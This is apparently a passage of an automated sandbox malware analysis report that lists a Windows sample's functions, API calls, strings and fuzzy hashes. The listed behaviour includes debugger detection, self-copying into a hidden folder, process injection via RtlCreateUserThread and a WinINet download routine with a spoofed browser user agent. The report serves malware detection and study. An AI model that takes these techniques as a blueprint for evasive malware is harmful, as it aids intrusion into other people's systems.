                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction ID: 34039160ea9d1361086e9d499959d6618fca35807634c7ef57284e22eb60ba32
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6611821A1DB8281FB64BF21AC5537A22A2AF44B43F400336D4CEC66A5DE2DFD49D718
                                                                                                                                                                                                                        Function 00007FF6C5DB40A4 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: 87982dc577717b87cb5bc53c93f1d1a9e77f02be9fdc8ad2655ab5ca000d67d3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89311932A19B8186D750DF15E85072AB766FBD4B82F101235FACE87B68DF3CE8418B04
                                                                                                                                                                                                                        Function 00007FF6C5DB3884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6C5DB3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetVolumeInformationW.KERNELBASE ref: 00007FF6C5DB37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: wsprintfW.USER32 ref: 00007FF6C5DB3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction ID: caaae042a56b6acba86239622576b9b12ec539095b67a3538940a9f83826d976
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75111521628A8685DB60AF25FC5476A6362FBC4B85F405231D58EC3B69DF3CE844C748
                                                                                                                                                                                                                        Function 00007FF6C5DB3A34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6C5DB3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetVolumeInformationW.KERNELBASE ref: 00007FF6C5DB37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: wsprintfW.USER32 ref: 00007FF6C5DB3862
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6C5DB3A79
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF6C5DB3A84
                                                                                                                                                                                                                        • CopyFileW.KERNELBASE ref: 00007FF6C5DB3A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6C5DB3AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: ecbe3fc6cb2ab480d5b01da4182260b38b741ba168c031364035396052de7fcc
                                                                                                                                                                                                                        • Instruction ID: 969ee2de46d75fede48438f545b482bb72fe615f0608bb29eb3c6ac52a75cccb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecbe3fc6cb2ab480d5b01da4182260b38b741ba168c031364035396052de7fcc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97019B61B1868293DF50EF24EC503AA5361FB84B45F905231D28DC35E4EF3CEA49CB04
                                                                                                                                                                                                                        Function 00007FF6C5DB3704 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: 18c9e638ef3a06555367ee7c6b1048842a8f8ce513b2bc0cde416047296fdc81
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA31F82661C6C186D730EF64E8983AAB3A1FB94B45F400236E2CDC7A58DF7DD949CB05
                                                                                                                                                                                                                        Function 00007FF6C5DB31AC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 1e7462af3a8cad9654bf686fe86bb88dd2fdc8b955315aefc8918146bc99bd51
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF03424D0D38281EB306F25AC1433A27A6BB45F8AF040374D5CD86294CF2CFA49EB29
                                                                                                                                                                                                                        Function 00007FF6C5DB14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 416 7ff6c5db14ec-7ff6c5db1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6C5DB15F1,?,?,?,?,?,?,?,?,00007FF6C5DB3418), ref: 00007FF6C5DB14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6C5DB15F1,?,?,?,?,?,?,?,?,00007FF6C5DB3418), ref: 00007FF6C5DB1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: c55a0b8a5ad5c9ef92017fc7f32be440d8016c24aa7fa68754d64a5b84d71409
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65E07E76508B8086C620AB15F84001AB7B4FB88B95B504225EACD82B28CF3CD5A58B04
                                                                                                                                                                                                                        Function 00007FF6C5DB3B14 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 420 7ff6c5db3b14-7ff6c5db3b3a VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction ID: be7fec7f844d53f572c5c86b1e9db4e9841b03c2c4456fcfacb063d361ebfc87
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74C080B1F27140C7D71CDF31E451B0F2A11B744741F504028D64257744CD3DD5514F04
                                                                                                                                                                                                                        Function 00007FF6C5DB3AE4 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 417 7ff6c5db3ae4-7ff6c5db3af3 418 7ff6c5db3af5-7ff6c5db3b02 VirtualFree 417->418 419 7ff6c5db3b08-7ff6c5db3b0c 417->419 418->419
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: dd4ef1dfff4d48ad5007379cba3b5bbd6db4a7d0e4e9ea571e90b4fc4f8b7175
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CD01221E39A4181E794AF26EC8971967A1FBC4B45F808139E6C981568CF3CE5D9CF08

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF6C5DB10D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: eb79ed835b43c0abe1e1b6ab2cdd68dfb6c9b8bfeb96773e1b8c34c77d66b686
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F71DD3190CB8186E770AF55E85436AB7A2F784B85F504235D6CDC6B98EF7CE884CB44
                                                                                                                                                                                                                        Function 00007FF6C5DB2160 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6C5DB219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: 14daa68a22086c7d0fb1a5577c391b4aabac9390c91e3708a259a738a495b5e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6971FA36919B8182E7509F51F85472AB761FBC4B96F501235EACE87B68CF7CE8848B04
                                                                                                                                                                                                                        Function 00007FF6C5DB4524 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
